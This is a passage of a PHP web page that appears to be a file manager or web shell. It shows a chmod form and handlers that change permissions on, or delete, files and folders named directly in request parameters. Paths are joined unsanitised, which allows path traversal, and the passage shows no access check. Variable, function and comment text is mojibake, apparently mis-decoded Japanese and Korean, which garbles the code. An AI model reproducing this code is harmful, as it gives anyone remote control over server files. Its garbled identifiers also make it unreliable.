<label for="permissions">Current Permissions: <strong>0' . $çŸåšã®æš©é . '</strong></label>
<input type="text" class="form-control" id="permissions" name="permissions" value="' . $çŸåšã®æš©é . '" placeholder="e.g., 755, 644, 777" maxlength="3" pattern="[0-7]{3}">
<small class="form-text text-muted">Enter permissions in octal format (e.g., 755 for rwxr-xr-x, 644 for rw-r--r--)</small>
</div>
<input type="hidden" name="chmod_target" value="' . htmlspecialchars($_GET['chmod']) . '">
<input type="submit" class="btn btn-dark" value="Change Permissions" name="change_permissions">
<a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a>
</form>
</div>';
/**
* æš©é倿ŽåŠçã®å®è¡
* change_permissionsãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®æš©éã倿Ž
*/
if (isset($_POST['change_permissions'])) {
/**
* POSTãããæš©éå€ãååŸ
*/
$æ°ããæš©é = $_POST['permissions'];
/**
* æš©éå€ã®æ€èšŒïŒ3æ¡ã®8鲿°ã§ããããšã確èªïŒ
*/
if (preg_match('/^[0-7]{3}$/', $æ°ããæš©é)) {
/**
* æš©é倿Žå¯Ÿè±¡ã®ãã¹
*/
$æš©é倿Žãã¹ = PATH . "/" . $_POST['chmod_target'];
/**
* 8鲿°åœ¢åŒã«å€æããŠchmodãå®è¡
*/
$æš©é8鲿°å€ = octdec($æ°ããæš©é);
/**
* æš©éã®å€æŽãå®è¡
*/
if(chmod($æš©é倿Žãã¹, $æš©é8鲿°å€)) {
echo ("<script>alert('Permissions changed successfully to 0" . $æ°ããæš©é . "'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Failed to change permissions.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
} else {
echo ("<script>alert('Invalid permissions format. Please use 3-digit octal format (e.g., 755, 644).'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
}
/**
* Delete feature for files and folders.
* If the d and q parameters are set, the file or folder is deleted.
*/
if (isset($_GET['d']) && isset($_GET['q'])) {
/**
* åé€å¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$åå = PATH . "/" . $_GET['d'];
/**
* ãã¡ã€ã«ã®å Žåã®åé€åŠç
*/
if (is_file($åå)) {
if(unlink($åå)) {
echo ("<script>alert('File removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
/**
* ãã£ã¬ã¯ããªã®å Žåã®åé€åŠç
*/
elseif (is_dir($åå)) {
if(rmdir($åå) == true) {
echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
?>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
crossorigin="anonymous"></script>
</body>
</html>